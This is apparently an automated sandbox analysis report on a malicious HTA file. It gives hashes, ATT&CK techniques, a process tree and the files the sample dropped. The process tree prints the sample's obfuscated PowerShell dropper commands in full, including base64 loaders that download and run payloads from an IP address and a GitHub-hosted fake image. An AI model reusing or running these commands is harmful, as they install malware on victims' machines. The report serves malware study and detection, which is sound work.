c6e6ef4d2a7c8dc43e114496de98a777e783cd554aa258736ef126ff8628d8c2

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
17-10-2024 14:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

verynicegirlneedsuperkiisingfromtheboy.hta
Size

130KB
MD5

bfa06f35d87c1939017d70c204d3a7d5
SHA1

bb80945300d62122564399f088f09d1760172c20
SHA256

c6e6ef4d2a7c8dc43e114496de98a777e783cd554aa258736ef126ff8628d8c2
SHA512

04465026afe312e8fa1420d8341f57c2742c2ee4ccc57f65659b77d31cc6cfa084787f587114fa05b75d8b0fcee87d55d67e162fb75f3ec92c0e9f5c4a06b0fa
SSDEEP

96:Eam7SVApoWIApM8RM9vZnQ8vFYDJuPPxfiApohP7T:Ea2SVAqzAelZFYF3AEDT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	1700	PoWershELl.exE
6	2980	powershell.exe
7	2980	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2716	powershell.exe
2980	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1700	PoWershELl.exE
1128	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
7	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWershELl.exE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1700	PoWershELl.exE
1128	powershell.exe
1700	PoWershELl.exE
1700	PoWershELl.exE
2716	powershell.exe
2980	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1700	PoWershELl.exE
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2828 wrote to memory of 1700	2828	mshta.exe	28
PID 2828 wrote to memory of 1700	2828	mshta.exe	28
PID 2828 wrote to memory of 1700	2828	mshta.exe	28
PID 2828 wrote to memory of 1700	2828	mshta.exe	28
PID 1700 wrote to memory of 1128	1700	PoWershELl.exE	30
PID 1700 wrote to memory of 1128	1700	PoWershELl.exE	30
PID 1700 wrote to memory of 1128	1700	PoWershELl.exE	30
PID 1700 wrote to memory of 1128	1700	PoWershELl.exE	30
PID 1700 wrote to memory of 2780	1700	PoWershELl.exE	31
PID 1700 wrote to memory of 2780	1700	PoWershELl.exE	31
PID 1700 wrote to memory of 2780	1700	PoWershELl.exE	31
PID 1700 wrote to memory of 2780	1700	PoWershELl.exE	31
PID 2780 wrote to memory of 2784	2780	csc.exe	32
PID 2780 wrote to memory of 2784	2780	csc.exe	32
PID 2780 wrote to memory of 2784	2780	csc.exe	32
PID 2780 wrote to memory of 2784	2780	csc.exe	32
PID 1700 wrote to memory of 2532	1700	PoWershELl.exE	34
PID 1700 wrote to memory of 2532	1700	PoWershELl.exE	34
PID 1700 wrote to memory of 2532	1700	PoWershELl.exE	34
PID 1700 wrote to memory of 2532	1700	PoWershELl.exE	34
PID 2532 wrote to memory of 2716	2532	WScript.exe	35
PID 2532 wrote to memory of 2716	2532	WScript.exe	35
PID 2532 wrote to memory of 2716	2532	WScript.exe	35
PID 2532 wrote to memory of 2716	2532	WScript.exe	35
PID 2716 wrote to memory of 2980	2716	powershell.exe	37
PID 2716 wrote to memory of 2980	2716	powershell.exe	37
PID 2716 wrote to memory of 2980	2716	powershell.exe	37
PID 2716 wrote to memory of 2980	2716	powershell.exe	37

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\verynicegirlneedsuperkiisingfromtheboy.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2828
- C:\Windows\SysWOW64\WINDOwsPowERshElL\V1.0\PoWershELl.exE
  "C:\Windows\SYStEM32\WINDOwsPowERshElL\V1.0\PoWershELl.exE" "PoweRShell -eX ByPAsS -NoP -w 1 -C DeVIcecrEdEntiAldepLoYMent.eXe ; ieX($(iEX('[sySTeM.texT.encODIng]'+[cHAr]0x3a+[cHAR]58+'Utf8.GeTstRING([SystEm.CONVERT]'+[CHaR]58+[chAr]0x3A+'fROMBase64STRInG('+[ChaR]0x22+'JHJWalU4b2hIMmVuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFcmRFZkluaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTWJUbE9NRkksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2hDLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdNSSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJzdWN3aUZLTkQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGSmZiakxZUlcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRyVmpVOG9oSDJlbjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC40MC85OTA5L25pY2VwaWN0dXJld2l0aGhlcmxpcHNvbnRoZWxpcHN0aWN3aXRoaGVyLnRpRiIsIiRlTnY6QVBQREFUQVxuaWNlcGljdHVyZXdpdGhoZXJsaXBzb250aGVsaXBzdGljd2l0aGhlci52YlMiLDAsMCk7U1RBUnQtU0xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcbmljZXBpY3R1cmV3aXRoaGVybGlwc29udGhlbGlwc3RpY3dpdGhoZXIudmJTIg=='+[cHar]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1700
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPAsS -NoP -w 1 -C DeVIcecrEdEntiAldepLoYMent.eXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1128
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lblc0hpb.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D14.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8D03.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2784
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicepicturewithherlipsonthelipsticwithher.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2532
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aW52b2tlLWV4cHJlU1NJb24oKCgnezF9aW1hZ2VVcmwgPSB7MH1odHRwczovL3Jhdy5naXRodWJ1c2VyY29udGUnKydudC5jb20vQ3J5cHQnKydlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMvbWFpbi9EZXRhaE5vdGVfVi5qcGcnKycgezB9JysnO3sxfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk4nKydldCcrJy5XZWJDbGllbnQ7ezF9aW1hZ2VCeXRlcyA9IHsxfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezF9aW1hZ2VVcmwpO3sxfWltYWdlVGV4dCA9IFtTeXN0ZW0uJysnVGV4dC5FbmNvZGknKyduZ106OlVURicrJzguR2V0UycrJ3RyaW5nKHsxfWltYWdlQnl0ZXMpO3sxfXN0YXJ0RmxhZyA9IHsnKycwJysnfTw8QkFTRTY0X1NUQVJUPj57MH07ezEnKyd9ZW5kRmxhZyA9IHswfTw8QkFTRTY0X0VORD4+ezB9O3sxJysnfXN0YXJ0SW5kZXggPSB7MX1pbWFnZVRleHQuSW5kZXhPZih7MScrJ31zdGFydEZsYWcpO3sxfScrJ2VuZEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9ZW5kRmxhZyk7ezF9c3RhcnRJbmRleCAtZ2UgMCAtYW5kIHsxfWVuZEluZGV4IC1ndCB7MX1zdGFydEluZGV4O3sxfXN0YXJ0SW5kZXggKz0gezF9c3RhcnRGbGFnLkxlbmd0aDt7MX1iYXNlNjRMZW5ndGggPSB7MX1lbmRJbmRleCAtIHsxfXN0YXJ0SW5kJysnZXg7ezF9YmFzZTY0Q29tbWFuZCA9IHsxfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezF9c3RhcnRJbmRleCwgezF9YmFzZTY0JysnTGVuZ3RoKTt7MX1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTYnKyc0U3RyaW5nJysnKHsxfWJhc2U2JysnNENvbW1hbicrJ2QpO3sxfWxvYWRlZEFzc2VtYmx5ID0gW1MnKyd5c3RlbScrJy5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MX1jb21tYW5kQnl0ZXMpO3sxfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoezB9VkFJezB9KTt7MX12YWlNZXRob2QuSW52b2tlKHsxfW51bCcrJ2wsIEAoezB9dHh0LkZDQ0VSUi85MDk5LzA0JysnLjAyMi4zLjI5MS8vOnB0dGh7MH0sIHswfWRlc2F0aXZhJysnZG97MH0sIHswfWQnKydlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZCcrJ2VzYXRpdmFkb3swfSkpOycpLUZbY2hBUl0zOSxbY2hBUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2716
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "invoke-expreSSIon((('{1}imageUrl = {0}https://raw.githubuserconte'+'nt.com/Crypt'+'ersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg'+' {0}'+';{1}webClient = New-Object System.N'+'et'+'.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUrl);{1}imageText = [System.'+'Text.Encodi'+'ng]::UTF'+'8.GetS'+'tring({1}imageBytes);{1}startFlag = {'+'0'+'}<<BASE64_START>>{0};{1'+'}endFlag = {0}<<BASE64_END>>{0};{1'+'}startIndex = {1}imageText.IndexOf({1'+'}startFlag);{1}'+'endIndex = {1}imageText.IndexOf({1}endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startInd'+'ex;{1}base64Command = {1}im'+'ageText.Substring({1}startIndex, {1}base64'+'Length);{1}commandBytes = [System.Convert]::FromBase6'+'4String'+'({1}base6'+'4Comman'+'d);{1}loadedAssembly = [S'+'ystem'+'.Refl'+'ection.Assembly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}nul'+'l, @({0}txt.FCCERR/9099/04'+'.022.3.291//:ptth{0}, {0}desativa'+'do{0}, {0}d'+'esativado{0}, {0}desativado{0}, {0}RegAsm{0}, {0}desativado{0}, {0}d'+'esativado{0}));')-F[chAR]39,[chAR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES8D14.tmp

Filesize
1KB

MD5
9511755ed229975436beca96ed3aebe2

SHA1
b5e0f50187301697af678c4a06ea40ad9163b6c6

SHA256
280756c0a01965a6986e81b530df32ee52e732f75b3f34b2d0dab1286b627467

SHA512
af06d78257eca34c0b52168a27f1eac4b6de4ddfdf660a1bca60f0d8af4e382beb00d05effd0b1bfb74c1405c5d8b3e0069e282fdc34e73c5cb371ddd49a52c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\lblc0hpb.dll

Filesize
3KB

MD5
cea08d9cc75c14416627f75fac97bfd5

SHA1
1303c4c37b2ffef0258cc481a8141a9775e2fa3d

SHA256
6a45279e683c5b1b231e08e61b358f0d39243e5290f63965161866c7c575c06a

SHA512
a7d7e33dd721169a2a2b7fe370c862f8ed103ce6b72be87a25d33651b9b42e1e1b25e8aa33489c7f8f3f608f31e90644285d01c0c5d42d892504a22b4594ec99

Download Submit
C:\Users\Admin\AppData\Local\Temp\lblc0hpb.pdb

Filesize
7KB

MD5
b714378933c65ccabc86f65867c20879

SHA1
623457fe0726c4ecb2b2f13e739debfa3f68a780

SHA256
bb878fb377d728b1fd2600120da7e823b7a4f1d1b481cfc645ae97000fdb41f5

SHA512
aba0e69448740b39639de2b528f29f7711798d96d6047e18e9130ffa3a594beda000ce163455659536713bf0e295210aff130840ae8c590cc01cf87ff37803d1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
6e296ce5ab1e8c945cb9b1a726f60b89

SHA1
18f46c63a8a8441a01155c09b724138d0b4463aa

SHA256
8713bb7eceb15930512f3c966c2c8eb7751d8e08ea064b8aa05812b7d4983936

SHA512
a5ab8d258e48e29a198587c76ec41fab80e5ffaf3bdc221bbf59ae6c4b00005758052d92a2307c94f41d6b68340fc124694ef84a85c36eb4267232c1004c1508

Download Submit
C:\Users\Admin\AppData\Roaming\nicepicturewithherlipsonthelipsticwithher.vbS

Filesize
190KB

MD5
2a9ee6d8ccd6eb9798a180e0e92c889c

SHA1
7871c7bfb07c278debbe50d3eff2b372918973e0

SHA256
56ba91564c0cdf1671dc0ebcd1c1323553627cd5f5e7622a1b66823e5e950650

SHA512
e5ada7fe9381706a7890d48a4b564e766030cca0e109c77a74e54354c390fe2d3981574a8ebed2d7e800148ba6cd245af4c11a4a0c105f56d6e19cdb89905e71

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC8D03.tmp

Filesize
652B

MD5
d46facfc0c8cd6e0b0801749406f3c8b

SHA1
6e6587a077d7f793cba0b16939f84d72490e9d0e

SHA256
029636562726eeb67800ed95b26aa12b0ad3109950bfe9495cf01ee1271bd9cc

SHA512
db06e32bda840970252a89c1b9e11a2f858d552e854f1bae785d961153564e45219c9f292a2019fc53d9e72161d935a3f99bf48eb84f67a468cfda75d57d0f70

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lblc0hpb.0.cs

Filesize
463B

MD5
ef1a52e62eb8136f57673b29cba789f5

SHA1
5d35e639e96c2d15d383b03ec1cbe89efd8ee75e

SHA256
dcf176d49fc46c4c6441a96381c4e85cd8af1b43a1468e05872538ed8c1f3584

SHA512
ad531d19065b816a6aa92a235ad89162bc68c256cce64859c1ba75ef72c4bd5343377fee478d019b2010d7defec7921aa96f84c0a75a1d66737de0735e9f0139

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lblc0hpb.cmdline

Filesize
309B

MD5
e3211f0b56fcbc20ed9d761d27915dd8

SHA1
9dec4cde214caf45992fed0271a23a516ccddb07

SHA256
a45e834655bf30d5b41372dd52a5989ad5847fb0fd2e305ca03592616e0bfdea

SHA512
e36c9c18dfa693f8913260c9e9ecdae422db2f7b90bd4c97bfd1c77d010b56db1934cd6ef6e334580c1e90213eee2082516fa87d7b13090e1ce11ea038ce5051

Download Submit